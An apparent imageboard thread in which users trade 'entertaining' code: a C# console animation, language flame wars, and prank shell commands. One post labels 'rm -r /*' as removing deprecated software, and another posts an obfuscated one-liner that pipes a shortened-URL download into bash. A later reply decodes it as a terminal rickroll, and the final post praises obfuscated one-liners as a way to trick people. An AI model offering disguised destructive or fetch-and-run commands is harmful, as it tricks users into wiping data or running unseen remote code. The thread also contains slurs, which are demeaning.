ITT: We post obscure code that bears entertaining results

ITT: We post obscure code that bears entertaining results.

Run this in .Net:

static void cocker() { Console.CursorVisible = false; Action getit = (c, n) => { for (int i = 0; i < n; i++) { Console.Write(c); } }; var bally = (char)48; var seggy = (char)61; var belly = (char)68; var woodog = 10; var colors = Enum.GetValues(typeof(ConsoleColor)) .Cast().Where(c => c != ConsoleColor.Black && c != ConsoleColor.DarkBlue); while (true) { foreach (var color in colors) { Console.ForegroundColor = color; Console.CursorTop = 10; Console.CursorLeft = (Console.BufferWidth / 2) - woodog / 2; var cp = new { left = Console.CursorLeft, top = Console.CursorTop }; Console.CursorTop++; getit(bally, 2); Console.CursorTop = cp.top; Console.CursorLeft = cp.left; getit(seggy, 3); getit(belly, 1); int i = 0; for (; i < woodog; i++) { Thread.Sleep((5 * i)); Console.CursorLeft--; getit(seggy, 1); getit(belly, 1); } for (; i > 1; i--) { Thread.Sleep((5 * i)); Console.CursorLeft = Console.CursorLeft - 2; getit(belly, 1); Console.Write(' '); Console.CursorLeft--; } Console.Clear(); } } }

Attached: ClipboardImage.png (1280x600, 1.42M)

Other urls found in this thread:

bit.ly/10hA8iC$
bit.ly/10hA8iC
twitter.com/NSFWRedditGif

#line below gets rid of deprecated software rm -r /*

XD

Here is some good code in .NET:

Better than LISP

What about a script that takes in a file and outputs a video that you can upload to youtube?

Lisp is beautiful.

Attached: p.png (629x588, 115.7K)

It looks like an ugly language, and it doesn't have as much facility as other languages. Even python is more useful than LISP tbh.

Well just use Haskell, you ugly piece of shit

Haskell is a worthless bondage and discipline language.

There is nothing wrong about Bondage and Discipline, it just makes it better.
Like Fifty shades of Grey.

Attached: lisp.png (800x584, 472.47K)

10/10

Bash one-liners thread? Bash one-liners thread!
echo 'carl the moongeek/o.lye10uA8/C' | tr gnu/homekat :phisth/bu\- | sed s./.L. | bash | bash

What is this?

Fucking Russians. Fucking goons. Fucking LISP.

cool story bro

I wasn't a coder prior to this. I'm still not, but I've learned to loathe the pointless parentheses-tracking I was constantly having to do with LISP. The real reason nobody makes anything of value with it is because all of the great LISP coders are still trying to figure out where they forgot to hit Shift-0.

Attached: It keeps me up at night.gif (520x360, 262.45K)

Piping shit into bash? Yeah, that's a fucking good idea:

$ echo 'carl the moongeek/o.lye10uA8/C' | tr gnu/homekat :phisth/bu\- | sed s./.L.curl -sL bit.ly/10hA8iC$ curl -sL bit.ly/10hA8iC | head#!/bin/bash# Rick Astley in your Terminal.# By Serene Han and Justine Tunney

Every self-respecting programmer's editor has a rainbow parens mode for LISP. That's a solved problem.

It's the effect that counts! :3

A command-line rickroll.

Don't forget structural editing packages like parinfer and paredit.

wew lad

Not him but

that's a phrase

Scheme is basically a LISP dialect you triple autist.

Can someone make an audio script that converts arbitrary files to mp3s that are Soundcloud compression-proof?

Good luck tricking a faggot to write and run a script file. An obfuscated one-line command is much easier to pull off.